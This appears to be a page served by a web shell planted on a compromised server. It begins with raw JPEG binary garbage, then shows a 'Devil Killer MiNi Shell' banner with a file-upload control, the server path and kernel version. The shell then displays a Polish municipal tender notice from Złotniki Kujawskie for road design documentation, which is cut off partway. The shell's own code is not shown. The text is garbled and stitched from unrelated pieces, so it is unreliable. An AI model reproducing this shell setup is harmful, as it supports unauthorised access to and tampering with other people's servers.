JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240927/0051953901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie kompletnej dokumentacji projektowo-kosztorysowej dla zadania przebudowy dróg w gminie Złotniki Kujawskie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Złotniki Kujawskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350808</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Złotniki Kujawskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zlotnikikujawskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zlotnikikuj.ires.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie kompletnej dokumentacji projektowo-kosztorysowej dla zadania przebudowy dróg w gminie Złotniki Kujawskie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe0ffb52-53cc-459a-b338-31fe6c4330db</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00519539</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016645/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Wykonanie kompletnej dokumentacji projektowo-kosztorysowej dla zadania przebudowy dróg w gminie Złotniki Kujawskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/988592 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/988592</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ministrów z dnia 31 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo -aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer<br/>klasy PC lub MAC onastępującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,jeden z<br/>systemów operacyjnych - MS Windows 7,Mac Os x 10 4, Linux, lub ich nowsze wersje, c)zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 100.,d) włączona obsługa JavaScript,e) zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików.pdf,f)Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,g) oznaczenie czasu odbioru danych przez Platformę stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Pozostałe wymagania zostały określone w SWZ oraz w regulaminie korzystania z platformy Open Nexus.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO, zamawiający informuje, że:<br/>1) administratorem a w przypadku zamówień współfinansowanych ze środków UE (jeżeli dotyczy) również podmiotem<br/>przetwarzającym wszelkie dane osobowe osób fizycznych związanych z niniejszym postępowaniem jest Urząd Gminy Złotniki<br/>Kujawskie z siedzibą przy ul. Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie,<br/>2) kontakt do inspektora ochrony danych osobowych: sekretariat@zlotnikikujawskie.pl<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>niniejszego zamówienia,<br/>4) odbiorcami ww. danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz<br/>art. 74 ustawy oraz umowy dofinansowania (jeżeli dotyczy),<br/>5) ww. dane osobowe będą przechowywane odpowiednio:<br/>- przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego albo przez cały okres obowiązywania<br/>umowy w sprawie zamówienia publicznego - jeżeli okres obowiązywania umowy przekracza 4 lata;<br/>- przez okres, o którym mowa w art. 125 ust. 4 lit. d) w zw. z art. 140 rozporządzenia Parlamentu Europejskiego nr 1303/2013 z dnia<br/>17.12.2013 r.<br/>w przypadku zamówień współfinansowanych ze środków UE;<br/>- do czasu przeprowadzania archiwizacji dokumentacji - w zakresie określonym w przepisach o archiwizacji,<br/>6) obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w<br/>postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy,<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8) osoba fizyczna, której dane osobowe dotyczą posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do ww. danych osobowych.<br/>W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia o którym mowa<br/>w art. 15 ust. 1-3 RODO, zamawiający może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>b) na podstawie art. 16 RODO prawo do sprostowania ww. danych osobowych (skorzystanie z prawa do sprostowania lub<br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych. Zgłoszenie żądania<br/>ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania. W przypadku, gdy<br/>wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania danych<br/>zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania<br/>o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba, że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza<br/>przepisy RODO,<br/>9) osobie fizycznej, której dane osobowe dotyczą nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.1.24.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres dokumentacji obejmuje wykonanie dokumentacji projektowej dla drogi zlokalizowanej w miejscowości Złotniki<br/>Kujawskie (dz. nr 65/32 oraz 99/1), która jest drogą wewnętrzną o długości ok. 73 m. Droga jest połączona z drogą gminną<br/>nr 150132C. Mapa poglądowa znajduje się w załączniku nr 8 – część 4.<br/>Wstępne założenia – przebudowa drogi polegać ma na wykonaniu:<br/>• nawierzchni asfaltowej,<br/>• zjazdów,<br/>• wykonanie obustronnych wzmocnionych poboczy<br/>• zastosowanie odwodnienia powierzchniowego,<br/>• warstwy stabilizacyjnej,<br/>• wyprofilowanie rowów i muld w miejscach newralgicznych (jeśli dotyczy),<br/>• badań geologicznych,<br/>• dokonanie odszukania granic i ich wznowienia, a w przypadku gdy tych granic nie będzie wymagane jest aby je ustalić,<br/>Dokumentacja powinna składać się z następujących elementów:<br/>1) Projekt zagospodarowania terenu – 6 egz.,<br/>2) Projekt architektoniczno-budowlany – 6 egz.,<br/>3) Projekt techniczny – 6 egz.,<br/>4) Opracowanie projektu wykonawczego stanowiącego uzupełnienie<br/>i uszczegółowienie projektu budowlanego – 6 egz.,<br/>5) Opracowanie projektu stałej i czasowej organizacji ruchu wraz z uzgodnieniem wymaganych uzgodnień i opinii oraz<br/>zatwierdzeniem – 6 egz.,<br/>6) Opracowanie dokumentacji geotechnicznej 3 egz.,<br/>7) Opracowanie inwentaryzacji zieleni – 6 egz.,<br/>8) Opracowanie przedmiarów robót oraz kosztorysów inwestorskich – 4 egz., (przedmiar oraz kosztorys ma zawierać także<br/>zakres prac związany z budową kanału technologicznego),<br/>9) Opracowanie szczególnych specyfikacji technicznych wykonania i odbioru robót – 4 egz.,<br/>10) Opracowanie wstępnej wersji dokumentacji projektowo-kosztorysowej<br/>Dokumentację, o której mowa powyżej Wykonawca zobowiązuje się dostarczyć<br/>w wersji elektronicznej – na płytach CD/DVD, pliki w formacie PDF oraz w wersji edytowalnej, rysunki w wersji DWG i PDF<br/>oraz kosztorysy i przedmiary w wersji PDF i w wersji edytowalnej ATH.<br/>Ponadto w ramach przedmiotu zamówienia:<br/>a) przedstawienie Zamawiającemu w ciągu 14 dni od dnia zawarcia umowy harmonogramu realizacji prac projektowych,<br/>celem jego akceptacji,<br/>b) wykonawca zobowiązany jest dokonać zgłoszenia robót budowlanych lub złożyć wniosek i uzyskać pozwolenie na<br/>budowę. W przypadku uwag Starosty Inowrocławskiego do zgłoszenia lub złożonego wniosku o pozwolenie na budowę<br/>Wykonawca zobowiązany jest do dokonania odpowiednich korekt. Ponadto Wykonawca zobowiązany jest do uzyskania<br/>braku sprzeciwu lub uzyskania decyzji<br/>o pozwoleniu na budowę/ZRID,<br/>b) w przypadku wystąpienia kolizji z infrastrukturą techniczną należy ją uzgodnić<br/>z gestorami urządzeń i uwzględnić w projekcie;<br/>c) uzyskanie mapy do celów projektowych,<br/>d) wykonawca zobowiązany będzie również do opracowania odpowiedzi na pytania dotyczące wykonania dokumentacji<br/>projektowej w trakcie realizacji inwestycji oraz na etapie postępowania o udzielenie zamówienia publicznego na roboty<br/>budowlane w terminie wyznaczonym przez Zamawiającego, nie dłuższym niż 3 dni robocze oraz sporządzenie wszelkich<br/>opracowań projektowych i wykonanie czynności niezbędnych do zrealizowania przedmiotu zamówienia;<br/>e) w przypadku konieczności zmiany dokumentacji projektowej – wystąpienie,<br/>w imieniu Zamawiającego z wnioskiem o zmianę dokumentacji,<br/>f) w przypadku, gdy w toku wykonawstwa robót budowlanych lub w okresie gwarancji robót zajdzie konieczność<br/>wprowadzenia uszczegółowień lub zmian do dokumentacji projektowej – wprowadzenie niezbędnych zmian (również w wersji elektronicznej)<br/>i dostarczenie poprawionej dokumentacji do siedziby Zamawiającego w terminie uzgodnionym z Zamawiającym,<br/>g) opracowana dokumentacja projektowo-kosztorysowa, z uwagi na jej późniejsze wykorzystanie przez Zamawiającego przy<br/>opracowaniu opisu przedmiotu zamówienia robót budowlanych, które podlegać będzie rygorom Prawa Zamówień<br/>Publicznych, nie może zawierać rozwiązań, które mogą w jakikolwiek sposób powodować naruszenie przez Zamawiającego<br/>przepisów Prawa Zamówień Publicznych, w szczególności nie mogą utrudniać uczciwej konkurencji,<br/>h) wykonawca po opracowaniu dokumentacji projektowej, uzyskaniu wymaganych uzgodnień i zatwierdzeń oraz uzyskaniu<br/>ostatecznej decyzji pozwolenia na budowę lub dokonaniu skutecznego zgłoszenia budowy/przebudowy/wykonania robót<br/>budowlanych zobowiązany jest do zdania Zamawiającemu kompletu dokumentacji,<br/>i) wykonawca uzyska decyzje środowiskową (jeśli dotyczy);<br/>j) wykonawca zobowiązany będzie dokonać jednokrotnej aktualizacji kosztorysu inwestorskiego przed wszczęciem przez<br/>Zamawiającego postępowania przetargowego na wykonanie przebudowy drogi – w ramach zaproponowanej ceny ofertowej;<br/>k) wykonawca będzie zobowiązany do:<br/>• ustalenia z Zamawiającym danych wyjściowych do sporządzenia przedmiarów,<br/>• uzgodnienia z Zamawiającym rozwiązań funkcjonalnych przed rozpoczęciem opracowania dokumentacji oraz<br/>uwzględnienie ustalonych wymogów podczas opracowania dokumentacji,<br/>• przedstawienie Zamawiającemu w ciągu 30 dni od dnia zawarcia umowy<br/>w siedzibie Zamawiającego wstępnej wersji dokumentacji projektowo-kosztorysowej, a po jej zaakceptowaniu przez<br/>Zamawiającego przystąpienie do dalszych prac projektowych,<br/>• wykorzystania w opracowanej dokumentacji projektowej najnowszych rozwiązań,<br/>• konsultacja na roboczo z Zamawiającym zaproponowanych rozwiązań<br/>i uzgadniania z Zamawiającym doboru materiałów budowlanych i standardów wykończenia zaproponowanych rozwiązań<br/>projektowych,<br/>• na etapie projektowania Zamawiający wymaga minimum dwukrotnego przeprowadzenia konsultacji koncepcji projektu w<br/>siedzibie Zamawiającego,<br/>• Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego o stanie zaawansowania prac oraz<br/>o proponowanych rozwiązaniach projektowych. Zamawiający zastrzega sobie prawo do oceny, korekty i akceptacji<br/>proponowanych rozwiązań w trakcie prowadzonych prac projektowych,<br/>• Zamawiający wymaga, aby Projektant w dokumentacji określił właściwości materiałów z uwzględnieniem art. 29 ustawy i<br/>zgodnie z wymogami art. 30 ust. 1-3 i 5 ustawy Prawo zamówień publicznych oraz z zachowaniem przepisów ustawy<br/>z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz.1233 ze zm.).<br/>(Powyższy wymóg uzasadniony jest tym, że stwarzanie sytuacji powodujących pośrednio lub bezpośrednio narzucanie<br/>wykonawcom robót przez podmioty trzecie konieczności dokonania zakupu u danego przedsiębiorcy poprzez podawanie w<br/>dokumentacji technicznej znaków towarowych, patentów lub pochodzenia urządzeń lub materiałów stanowi tzw. czyn<br/>nieuczciwej konkurencji w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji.) UWAGA:<br/>• Wykonawca na podstawie udzielonego pełnomocnictwa do działania w imieniu Gminy Złotniki Kujawskie zobowiązany jest<br/>w imieniu Zamawiającego i na jego rzecz uzyskać wymagane opinie, uzgodnienia, warunki i decyzje niezbędne do<br/>opracowania projektu. Koszty z tym związane ponosi Wykonawca, w ramach zaproponowanej ceny ofertowej,<br/>• Jeżeli w trakcie opracowywania ww. projektu nastąpi zmiana przepisów należy je uwzględnić przy realizacji przedmiotu<br/>zamówienia,<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju z 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowalnego<br/>(Dz. U. z 2022 r.<br/>poz. 1679 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r.<br/>w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót<br/>budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2021 r. poz. 2454 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte<br/>w Rozporządzeniu Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r.<br/>w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac<br/>projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym<br/>(Dz.U. z 2021 r. poz. 2458 ze zm.),<br/>• Dokumentacja projektowa powinna spełniać wymagania zawarte w ustawie<br/>z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2022 r. poz. 2240, ze zm.),<br/>• Złożony przez Wykonawcę projekt (zakres i forma) musi spełniać wszelkie wymagania niezbędne do wszczęcia iprowadzenia o udzielenie zamówienia publicznego, a następnie rozpoczęcia i wykonania robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres dokumentacji obejmuje wykonanie dokumentacji projektowej dla drogi zlokalizowanej w miejscowości Mierzwin (dz.<br/>nr 8, 29/8, 49/4, 30/1), która jest drogą wewnętrzną o długości ok. 500 m.<br/>Dokumentacja projektowa ma być wykonana dla całego odcinka drogi, natomiast przedmiar i kosztorys mają zostać<br/>podzielone na dwa etapy zgodnie z mapą poglądową dla części 5 zlokalizowanej w załączniku nr 8.<br/>Wstępne założenia – przebudowa drogi polegać ma na wykonaniu:<br/>• nawierzchni asfaltowej,<br/>• zjazdów,<br/>• wykonanie obustronnych wzmocnionych poboczy<br/>• zastosowanie odwodnienia powierzchniowego,<br/>• warstwy stabilizacyjnej,<br/>• wyprofilowanie rowów i muld w miejscach newralgicznych (jeśli dotyczy),<br/>• badań geologicznych,<br/>• dokonanie odszukania granic i ich wznowienia, a w przypadku gdy tych granic nie będzie wymagane jest aby je ustalić,<br/>W pasie drogowym mogą występować zadrzewienia, w związku z czym należy wykonać inwentaryzację drzew<br/>przeznaczonych do wycinki lub podać informację, że nie ma potrzeby ich wykonywania. Należy dążyć do ograniczenia<br/>konieczności wycinki drzew do niezbędnego minimum. Jeżeli wystąpi konieczność wycinki drzew projektant wystąpi z<br/>wnioskiem i uzyska decyzję.<br/>Dokumentacja powinna składać się z następujących elementów:<br/>1) Projekt zagospodarowania terenu – 6 egz.,<br/>2) Projekt architektoniczno-budowlany – 6 egz.,<br/>3) Projekt techniczny – 6 egz.,<br/>4) Opracowanie projektu wykonawczego stanowiącego uzupełnienie<br/>i uszczegółowienie projektu budowlanego – 6 egz.,<br/>5) Opracowanie projektu stałej i czasowej organizacji ruchu wraz z uzgodnieniem wymaganych uzgodnień i opinii 